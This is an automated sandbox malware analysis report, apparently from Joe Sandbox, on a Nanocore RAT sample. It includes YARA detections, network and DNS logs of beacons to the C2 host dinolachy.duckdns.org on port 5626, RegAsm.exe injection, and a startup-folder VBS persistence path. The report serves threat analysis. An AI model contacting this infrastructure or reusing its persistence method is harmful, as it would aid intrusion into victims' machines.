KERNEL32.dll | VirtualProtect, GetConsoleWindow, CreateFileW, DecodePointer, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, GetStringTypeW, GetFileType, SetStdHandle, LCMapStringW, CompareStringW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, IsValidCodePage, FindNextFileA, FindFirstFileExA, FindClose, CloseHandle, HeapAlloc, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetACP, HeapFree, RaiseException
imagehlp.dll | UnDecorateSymbolName, SymGetSymFromAddr64
MAPI32.dll |
USER32.dll | GetAncestor, SetWindowPos, ChangeMenuA, BroadcastSystemMessage, SubtractRect, IsDialogMessageA, CountClipboardFormats
mscms.dll | DeleteColorTransform, InstallColorProfileA, SetColorProfileHeader, GetPS2ColorRenderingIntent, SetColorProfileElementReference
WINSPOOL.DRV | EnumPrinterDataW, OpenPrinterA, EnumPrinterKeyA
ODBC32.dll |
msi.dll |
Description | Data
LegalCopyright | Copyright (C) land-born 2019
InternalName | cardsharper.exe
FileVersion | 8.2.1.4
CompanyName | vanes
ProductName | aggeration
ProductVersion | 7.6.0.2
FileDescription | spermary
OriginalFilename | unobservant.exe
Translation | 0x0409 0x04b0

Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 19, 2022 05:19:35.391271114 CEST | 49760 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:35.604505062 CEST | 5626 | 49760 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:19:35.604670048 CEST | 49760 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:35.661648035 CEST | 49760 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:35.899727106 CEST | 5626 | 49760 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:19:40.045200109 CEST | 49761 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:40.334722042 CEST | 5626 | 49761 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:19:40.334908962 CEST | 49761 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:40.355438948 CEST | 49761 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:40.629517078 CEST | 5626 | 49761 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:19:44.675549030 CEST | 49762 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:44.999265909 CEST | 5626 | 49762 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:19:44.999759912 CEST | 49762 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:45.004966021 CEST | 49762 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:19:45.291423082 CEST | 5626 | 49762 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:04.840961933 CEST | 49774 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:05.154113054 CEST | 5626 | 49774 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:05.154316902 CEST | 49774 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:05.161387920 CEST | 49774 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:05.464230061 CEST | 5626 | 49774 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:09.601588964 CEST | 49775 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:09.902873039 CEST | 5626 | 49775 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:09.903219938 CEST | 49775 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:09.904114008 CEST | 49775 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:10.191227913 CEST | 5626 | 49775 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:14.236185074 CEST | 49776 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:14.530116081 CEST | 5626 | 49776 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:14.530278921 CEST | 49776 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:14.530742884 CEST | 49776 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:14.815737009 CEST | 5626 | 49776 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:34.964564085 CEST | 49829 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:35.244076967 CEST | 5626 | 49829 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:35.244360924 CEST | 49829 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:35.251326084 CEST | 49829 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:35.520592928 CEST | 5626 | 49829 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:39.559667110 CEST | 49837 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:39.872410059 CEST | 5626 | 49837 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:39.872554064 CEST | 49837 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:39.873094082 CEST | 49837 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:40.164750099 CEST | 5626 | 49837 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:44.291788101 CEST | 49839 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:44.577816963 CEST | 5626 | 49839 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:20:44.579777002 CEST | 49839 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:44.602205038 CEST | 49839 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:20:44.877954006 CEST | 5626 | 49839 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:21:04.218692064 CEST | 49866 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:04.455672026 CEST | 5626 | 49866 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:21:04.455786943 CEST | 49866 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:04.458276033 CEST | 49866 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:04.747319937 CEST | 5626 | 49866 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:21:08.868937969 CEST | 49869 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:09.173266888 CEST | 5626 | 49869 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:21:09.173451900 CEST | 49869 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:09.174114943 CEST | 49869 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:09.475833893 CEST | 5626 | 49869 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:21:13.529231071 CEST | 49871 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:13.753601074 CEST | 5626 | 49871 | 192.169.69.25 | 192.168.2.4
May 19, 2022 05:21:13.753717899 CEST | 49871 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:13.763097048 CEST | 49871 | 5626 | 192.168.2.4 | 192.169.69.25
May 19, 2022 05:21:14.037683010 CEST | 5626 | 49871 | 192.169.69.25 | 192.168.2.4
      TimestampSource PortDest PortSource IPDest IP
      May 19, 2022 05:19:35.271678925 CEST6050653192.168.2.48.8.8.8
      May 19, 2022 05:19:35.380067110 CEST53605068.8.8.8192.168.2.4
      May 19, 2022 05:19:39.935419083 CEST6427753192.168.2.48.8.8.8
      May 19, 2022 05:19:40.044132948 CEST53642778.8.8.8192.168.2.4
      May 19, 2022 05:19:44.650464058 CEST5607653192.168.2.48.8.8.8
      May 19, 2022 05:19:44.667726994 CEST53560768.8.8.8192.168.2.4
      May 19, 2022 05:20:04.727262020 CEST6038153192.168.2.48.8.8.8
      May 19, 2022 05:20:04.837091923 CEST53603818.8.8.8192.168.2.4
      May 19, 2022 05:20:09.485280991 CEST5650953192.168.2.48.8.8.8
      May 19, 2022 05:20:09.593802929 CEST53565098.8.8.8192.168.2.4
      May 19, 2022 05:20:14.216454983 CEST5406953192.168.2.48.8.8.8
      May 19, 2022 05:20:14.234416008 CEST53540698.8.8.8192.168.2.4
      May 19, 2022 05:20:34.752480030 CEST6149753192.168.2.48.8.8.8
      May 19, 2022 05:20:34.861716032 CEST53614978.8.8.8192.168.2.4
      May 19, 2022 05:20:39.538358927 CEST6041853192.168.2.48.8.8.8
      May 19, 2022 05:20:39.558176041 CEST53604188.8.8.8192.168.2.4
      May 19, 2022 05:20:44.182333946 CEST6425953192.168.2.48.8.8.8
      May 19, 2022 05:20:44.290632010 CEST53642598.8.8.8192.168.2.4
      May 19, 2022 05:21:04.108495951 CEST5871553192.168.2.48.8.8.8
      May 19, 2022 05:21:04.217644930 CEST53587158.8.8.8192.168.2.4
      May 19, 2022 05:21:08.758953094 CEST5781653192.168.2.48.8.8.8
      May 19, 2022 05:21:08.867835999 CEST53578168.8.8.8192.168.2.4
      May 19, 2022 05:21:13.507783890 CEST5391653192.168.2.48.8.8.8
      May 19, 2022 05:21:13.527236938 CEST53539168.8.8.8192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      May 19, 2022 05:19:35.271678925 CEST192.168.2.48.8.8.80x19ecStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:19:39.935419083 CEST192.168.2.48.8.8.80x5d07Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:19:44.650464058 CEST192.168.2.48.8.8.80x6fcfStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:04.727262020 CEST192.168.2.48.8.8.80xf60bStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:09.485280991 CEST192.168.2.48.8.8.80x474Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:14.216454983 CEST192.168.2.48.8.8.80x37aStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:34.752480030 CEST192.168.2.48.8.8.80xd39fStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:39.538358927 CEST192.168.2.48.8.8.80x6194Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:20:44.182333946 CEST192.168.2.48.8.8.80x4b2cStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:21:04.108495951 CEST192.168.2.48.8.8.80x30eaStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:21:08.758953094 CEST192.168.2.48.8.8.80xa247Standard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      May 19, 2022 05:21:13.507783890 CEST192.168.2.48.8.8.80x5cdeStandard query (0)dinolachy.duckdns.orgA (IP address)IN (0x0001)
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      May 19, 2022 05:19:35.380067110 CEST8.8.8.8192.168.2.40x19ecNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:19:40.044132948 CEST8.8.8.8192.168.2.40x5d07No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:19:44.667726994 CEST8.8.8.8192.168.2.40x6fcfNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:04.837091923 CEST8.8.8.8192.168.2.40xf60bNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:09.593802929 CEST8.8.8.8192.168.2.40x474No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:14.234416008 CEST8.8.8.8192.168.2.40x37aNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:34.861716032 CEST8.8.8.8192.168.2.40xd39fNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:39.558176041 CEST8.8.8.8192.168.2.40x6194No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:20:44.290632010 CEST8.8.8.8192.168.2.40x4b2cNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:21:04.217644930 CEST8.8.8.8192.168.2.40x30eaNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:21:08.867835999 CEST8.8.8.8192.168.2.40xa247No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:21:13.527236938 CEST8.8.8.8192.168.2.40x5cdeNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)


      Target ID:0
      Start time:05:19:17
      Start date:19/05/2022
      Path:C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Imagebase:0x260000
      File size:409169 bytes
      MD5 hash:A93162E62B49A591E0D481E030FFC9EA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
      • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Reputation:low

      Target ID:1
      Start time:05:19:18
      Start date:19/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff647620000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:3
      Start time:05:19:25
      Start date:19/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Imagebase:0xa90000
      File size:64616 bytes
      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Reputation:high

      Target ID:6
      Start time:05:19:35
      Start date:19/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs"
      Imagebase:0x7ff784990000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:7
      Start time:05:19:36
      Start date:19/05/2022
      Path:C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Wow64 process (32bit):true
      Commandline:C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Imagebase:0xab0000
      File size:409170 bytes
      MD5 hash:CA51A0A9E3EF192B26D9818DC4EC5FF0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
      • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Antivirus matches:
      • Detection: 100%, Avira
      • Detection: 100%, Joe Sandbox ML
      • Detection: 63%, ReversingLabs
      Reputation:low

      Target ID:8
      Start time:05:19:36
      Start date:19/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff647620000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:12
      Start time:05:19:40
      Start date:19/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Imagebase:0xca0000
      File size:64616 bytes
      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Reputation:high


        Execution Graph

        Execution Coverage:22.9%
        Dynamic/Decrypted Code Coverage:15.6%
        Signature Coverage:2.6%
        Total number of Nodes:1973
        Total number of Limit Nodes:49
_abort 38 API calls 7075->7076 7096 267861 7076->7096 7077->7063 7078 264c4a _abort 38 API calls 7077->7078 7078->7063 7104 263d28 7079->7104 7085 26755a 7082->7085 7084 26475d 7084->7041 7084->7052 7086 267566 ___scrt_is_nonwritable_in_current_image 7085->7086 7087 2661a3 _abort EnterCriticalSection 7086->7087 7088 267574 7087->7088 7089 2675a8 _abort LeaveCriticalSection 7088->7089 7090 26759b ___scrt_is_nonwritable_in_current_image 7089->7090 7090->7084 7091->7066 7092->7068 7094 264c4a _abort 38 API calls 7093->7094 7095 26769d 7094->7095 7095->7075 7097 267867 7096->7097 7099 267830 7096->7099 7103 2661eb LeaveCriticalSection 7097->7103 7099->7063 7099->7073 7099->7077 7101 2629bb _ValidateLocalCookies 5 API calls 7100->7101 7102 26bf54 7101->7102 7102->7102 7103->7099 7105 263d34 _abort 7104->7105 7106 2626b6 _abort GetModuleHandleW 7105->7106 7113 263d4c 7105->7113 7108 263d40 7106->7108 7108->7113 7126 263e82 GetModuleHandleExW 7108->7126 7112 263dc9 7117 263de1 7112->7117 7121 263c55 _abort 5 API calls 7112->7121 7133 2661a3 EnterCriticalSection 7113->7133 7114 263d54 7114->7112 7125 263df2 7114->7125 7134 264445 7114->7134 7115 263e0f 7140 263e41 7115->7140 7116 263e3b 7120 26bf49 _abort 5 API calls 7116->7120 7122 263c55 _abort 5 API calls 7117->7122 7124 263e40 7120->7124 7121->7117 7122->7125 7137 263e32 7125->7137 7127 263eac GetProcAddress 7126->7127 7131 263ec1 7126->7131 7127->7131 7128 263ed5 FreeLibrary 7129 263ede 7128->7129 7130 2629bb _ValidateLocalCookies 5 API calls 7129->7130 7132 263ee8 7130->7132 7131->7128 7131->7129 7132->7113 7133->7114 7135 26417e _abort 20 API calls 7134->7135 7136 26445c 7135->7136 7136->7112 7138 2661eb _abort LeaveCriticalSection 7137->7138 7139 263e0b 7138->7139 7139->7115 7139->7116 7141 26666e _abort 10 API calls 7140->7141 7142 263e4b 7141->7142 7143 263e6f 7142->7143 7144 263e4f GetPEB 7142->7144 7146 263e82 _abort 8 API calls 7143->7146 7144->7143 7145 263e5f GetCurrentProcess TerminateProcess 7144->7145 
7145->7143 7147 263e77 ExitProcess 7146->7147 7148->7006 7152 2661eb LeaveCriticalSection 7149->7152 7151 265a70 7151->7006 7152->7151 7154 264815 7153->7154 7160 26480b 7153->7160 7155 264c4a _abort 38 API calls 7154->7155 7154->7160 7156 264836 7155->7156 7161 267f84 7156->7161 7160->7014 7160->7015 7162 267f97 7161->7162 7163 26484f 7161->7163 7162->7163 7169 267255 7162->7169 7165 267fb1 7163->7165 7166 267fc4 7165->7166 7167 267fd9 7165->7167 7166->7167 7168 2659d8 __fassign 38 API calls 7166->7168 7167->7160 7168->7167 7170 267261 ___scrt_is_nonwritable_in_current_image 7169->7170 7171 264c4a _abort 38 API calls 7170->7171 7172 26726a 7171->7172 7173 2672b8 ___scrt_is_nonwritable_in_current_image 7172->7173 7181 2661a3 EnterCriticalSection 7172->7181 7173->7163 7175 267288 7182 2672cc 7175->7182 7180 264758 _abort 38 API calls 7180->7173 7181->7175 7183 26729c 7182->7183 7184 2672da __fassign 7182->7184 7186 2672bb 7183->7186 7184->7183 7185 267008 __fassign 20 API calls 7184->7185 7185->7183 7187 2661eb _abort LeaveCriticalSection 7186->7187 7188 2672af 7187->7188 7188->7173 7188->7180 7195 26575f 7189->7195 7198 265809 7189->7198 7192 2629bb _ValidateLocalCookies 5 API calls 7194 2658b5 7192->7194 7194->7028 7199 266e4e 7195->7199 7197 268a70 43 API calls 7197->7198 7198->7192 7200 2647f8 __fassign 38 API calls 7199->7200 7201 266e6e MultiByteToWideChar 7200->7201 7203 266eac 7201->7203 7204 266f44 7201->7204 7206 2646b0 __onexit 21 API calls 7203->7206 7210 266ecd __alloca_probe_16 ___scrt_fastfail 7203->7210 7205 2629bb _ValidateLocalCookies 5 API calls 7204->7205 7207 2657c0 7205->7207 7206->7210 7213 268a70 7207->7213 7208 266f3e 7218 266f6b 7208->7218 7210->7208 7211 266f12 MultiByteToWideChar 7210->7211 7211->7208 7212 266f2e GetStringTypeW 7211->7212 7212->7208 7214 2647f8 __fassign 38 API calls 7213->7214 7215 268a83 7214->7215 7222 268853 7215->7222 7219 266f88 7218->7219 7220 266f77 7218->7220 7219->7204 7220->7219 7221 264676 ___free_lconv_mon 20 
API calls 7220->7221 7221->7219 7223 26886e 7222->7223 7224 268894 MultiByteToWideChar 7223->7224 7225 2688be 7224->7225 7226 268a48 7224->7226 7231 2646b0 __onexit 21 API calls 7225->7231 7232 2688df __alloca_probe_16 7225->7232 7227 2629bb _ValidateLocalCookies 5 API calls 7226->7227 7228 2657e1 7227->7228 7228->7197 7229 268994 7235 266f6b __freea 20 API calls 7229->7235 7230 268928 MultiByteToWideChar 7230->7229 7233 268941 7230->7233 7231->7232 7232->7229 7232->7230 7249 266564 7233->7249 7235->7226 7237 2689a3 7239 2646b0 __onexit 21 API calls 7237->7239 7243 2689c4 __alloca_probe_16 7237->7243 7238 26896b 7238->7229 7241 266564 11 API calls 7238->7241 7239->7243 7240 268a39 7242 266f6b __freea 20 API calls 7240->7242 7241->7229 7242->7229 7243->7240 7244 266564 11 API calls 7243->7244 7245 268a18 7244->7245 7245->7240 7246 268a27 WideCharToMultiByte 7245->7246 7246->7240 7247 268a67 7246->7247 7248 266f6b __freea 20 API calls 7247->7248 7248->7229 7250 26621c _abort 5 API calls 7249->7250 7251 26658b 7250->7251 7252 2665ec 10 API calls 7251->7252 7255 266594 7251->7255 7253 2665d4 LCMapStringW 7252->7253 7253->7255 7254 2629bb _ValidateLocalCookies 5 API calls 7256 2665e6 7254->7256 7255->7254 7256->7229 7256->7237 7256->7238 7258 2654ec ___scrt_is_nonwritable_in_current_image 7257->7258 7265 2661a3 EnterCriticalSection 7258->7265 